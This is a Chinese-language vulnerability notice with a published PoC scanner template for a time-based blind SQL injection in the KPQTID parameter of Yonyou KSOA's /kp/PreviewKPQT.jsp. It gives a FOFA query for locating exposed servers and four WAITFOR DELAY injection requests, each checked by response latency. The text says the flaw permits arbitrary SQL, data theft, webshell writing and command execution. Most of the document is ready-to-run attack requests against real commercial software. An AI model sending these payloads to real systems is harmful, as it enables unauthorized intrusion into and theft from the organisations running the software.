漏洞描述
用友时空KSOA接口 /kp/PreviewKPQT.jsp 接口存在SQL注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
fofa: app="用友-时空KSOA"
yonyou-ksoa-previewkpqt-sqli: 用友时空KSOA系统接口PreviewKPQT.jsp-SQL注入漏洞
PoC代码[已公开]
id: yonyou-ksoa-previewkpqt-sqli
info:
name: 用友时空KSOA系统接口PreviewKPQT.jsp-SQL注入漏洞
author: avic123
severity: critical
verified: true
description: |-
用友时空KSOA接口 /kp/PreviewKPQT.jsp 接口存在SQL注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
fofa: app="用友-时空KSOA"
reference:
- https://blog.csdn.net/holyxp/article/details/132310244
tags: yonyou,sqli
created: 2025/03/21
rules:
r0:
request:
method: GET
path: /kp/PreviewKPQT.jsp?KPQTID=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--
expression: |
response.status == 200 && response.latency <= 7000 && response.latency >= 5000
r1:
request:
method: GET
path: /kp/PreviewKPQT.jsp?KPQTID=1%27%3BWAITFOR+DELAY+%270%3A0%3A10%27--
expression: |
response.status == 200 && response.latency <= 12000 && response.latency >= 10000
r2:
request:
method: GET
path: /kp/PreviewKPQT.jsp?KPQTID=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--
expression: |
response.status == 200 && response.latency <= 7000 && response.latency >= 5000
r3:
request:
method: GET
path: /kp/PreviewKPQT.jsp?KPQTID=1%27%3BWAITFOR+DELAY+%270%3A0%3A10%27--
expression: |
response.status == 200 && response.latency <= 12000 && response.latency >= 10000
expression: r0() && r1() && r2() && r3()